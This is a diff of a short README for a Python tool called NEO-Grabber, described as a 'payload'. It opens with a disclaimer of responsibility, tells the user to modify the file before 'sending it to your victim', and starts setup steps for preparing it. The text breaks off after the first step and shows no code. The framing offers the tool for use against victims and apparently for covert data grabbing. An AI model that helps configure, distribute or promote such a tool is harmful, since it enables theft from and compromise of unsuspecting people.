TheGeekLucas/NEO-Grabber/README.md

 **I AM NOT RESPONSIBLE FOR ANY ILLEGAL OR HARMFUL ACTIONS PROVIDED WITH THIS TOOL.**

 # NEO-Grabber
  Really Simple "Payload" written in python.
-You also must change some things in the file before sending it to the victim!
+You also must change some things in the file before sending it to your victim and in order to make it work!
 # SETUP
 >**1.
 Download the "NEO GRABBER" File and Open it in Notepad or open it as a txt file.**